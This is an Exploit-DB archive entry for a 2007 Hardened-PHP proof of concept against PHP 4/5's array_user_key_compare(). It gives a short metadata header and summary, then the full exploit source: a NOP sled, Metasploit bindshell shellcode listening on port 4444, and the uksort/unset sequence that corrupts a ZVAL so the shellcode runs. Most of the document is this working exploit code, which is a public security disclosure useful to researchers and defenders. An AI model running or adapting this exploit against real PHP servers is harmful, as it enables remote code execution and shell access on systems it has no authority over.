PHP array_user_key_compare() ZVAL dtor exploit

vendor:

PHP

by:

Stefan Esser

7.5

CVSS

HIGH

Remote Code Execution

Unknown

CWE

Product Name: PHP

Affected Version From: PHP 4/5

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

PHP array_user_key_compare() ZVAL dtor exploit

This is a proof of concept code from the Hardened-PHP Project. It exploits a vulnerability in the array_user_key_compare() function in PHP 4/5, allowing for remote code execution. The code starts with a NOP sled followed by shellcode that creates a bindshell on port 4444. It then creates an array with a specially crafted key that triggers the vulnerability. The array is sorted using the array_compare() function, which manipulates the key to point to a controlled memory address. Finally, the exploit creates another array with the shellcode as the key.

Mitigation:

Upgrade to a patched version of PHP or apply the vendor-supplied patch. Additionally, ensure that remote file inclusion protection mechanisms are in place.

Source

Exploit-DB raw data:

<?php
  ////////////////////////////////////////////////////////////////////////
  //  _  _                _                     _       ___  _  _  ___  //
  // | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \ //
  // | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/ //
  // |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|   //
  //                                                                    //
  //         Proof of concept code from the Hardened-PHP Project        //
  //                   (C) Copyright 2007 Stefan Esser                  //
  //                                                                    //
  ////////////////////////////////////////////////////////////////////////
  //        PHP 4/5 - array_user_key_compare() ZVAL dtor exploit        //
  ////////////////////////////////////////////////////////////////////////

  // This is meant as a protection against remote file inclusion.
  die("REMOVE THIS LINE");

  // You can put in any shellcode you want. Just make sure that the
  // shellcode string starts with enough NOP space

  // NOPSPACE
  $shellcode = str_repeat(chr(0x90), 710);
  // A bindshell on port 4444 generated by Metsploit
  $shellcode .= "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
      "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
      "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
      "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
      "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
      "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
      "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";

  $arr = array(str_repeat("A", 39) => 1, "B" => 1);

  function array_compare(&$key1, &$key2)
  {
    $GLOBALS['a'] = &$key2;
    unset($key2);
    return 1;
  }

  uksort($arr, "array_compare");
  $x=array($shellcode => 1);

  $a[8*4+0] = $a[6*4+0];
  $a[8*4+1] = chr(ord($a[6*4+1])+2); // <--- This only works for Little Endian
  $a[8*4+2] = $a[6*4+2];
  $a[8*4+3] = $a[6*4+3];

  unset($x);

?>

# milw0rm.com [2007-03-16]